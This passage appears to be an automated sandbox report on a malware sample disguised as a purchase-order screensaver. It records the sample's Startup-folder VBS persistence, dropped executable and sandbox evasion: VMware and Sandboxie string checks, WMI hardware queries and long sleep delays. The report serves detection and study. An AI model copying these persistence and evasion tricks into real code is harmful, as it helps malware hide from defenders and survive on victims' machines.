                      Source: Yara matchFile source: 00000000.00000002.2345240998.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2332483290.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Purchase Order A2409002.scr.exe PID: 5328, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F8A2E1 pushad ; ret 0_2_02F8A2E2
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F82B78 push eax; iretd 0_2_02F82B79
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F8A342 pushad ; ret 0_2_02F8A343
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F8A32D pushad ; ret 0_2_02F8A32E
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06182F63 push es; retf 0_2_06182F64
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06182FEF push es; ret 0_2_06182FF0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06186C41 push es; ret 0_2_06186C50
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9EFA0 push FFFFFF8Bh; iretd 0_2_06E9EFA7
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9BF3F push es; ret 0_2_06E9BF40
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9656F push es; iretd 0_2_06E96570
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9831E push ds; ret 0_2_06E9831F
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9F0C8 push FFFFFF8Bh; iretd 0_2_06E9F0CF
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC06F8 push ebp; ret 0_2_06FC06F9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC40B1 push es; ret 0_2_06FC410C
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC4168 push es; ret 0_2_06FC410C
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC410D push es; ret 0_2_06FC410C
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3EF1 push es; ret 0_2_06FC3FE0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3EEA push es; ret 0_2_06FC3EF0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3EC3 push es; ret 0_2_06FC3EF0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3EC3 push es; ret 0_2_06FC3FE0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3FE1 push es; ret 0_2_06FC4048
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3FA6 push es; ret 0_2_06FC3FE0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC0F2E push ss; retf 0_2_06FC0F2F
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3F22 push es; ret 0_2_06FC3FE0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC3D92 push edi; ret 0_2_06FC3D93
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC0880 push ebp; iretd 0_2_06FC08A4
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_07036EF0 push es; ret 0_2_07036F00
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_07036EFD push es; ret 0_2_07036F00
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0703DA80 push esp; retf 0_2_0703DA8D
                      Source: 0.2.Purchase Order A2409002.scr.exe.6bb0000.9.raw.unpack, tEIvDidBQryKBi4B8O8.csHigh entropy of concatenated method names: 'uUSdHAOXFl', 'DDBd2lNpNN', 'oPmdFq8kPu', 'CRfdgcVgdm', 'l1edsRcJlg', 'OXNdx8SKAT', 'JMBdRPnKZd', 'skad0geo1n', 'b1Sd6xpLaN', 'ab8dmR6HpT'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile created: C:\Users\user\AppData\Roaming\InheritanceFlags.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Purchase Order A2409002.scr.exe PID: 5328, type: MEMORYSTR
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeWindow / User API: threadDelayed 1164Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeWindow / User API: threadDelayed 4073Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4824Thread sleep count: 1164 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4824Thread sleep count: 4073 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99159s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -99047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98479s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98114s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -98000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -97888s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -97781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -97672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -97562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe TID: 4488Thread sleep time: -97453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99516Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99406Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99159Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98828Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98479Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98114Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 97888Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 97781Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 97672Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 97562Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeThread delayed: delay time: 97453Jump to behavior
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2342774771.0000000006AB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:Microsoft|VMWare|Virtual
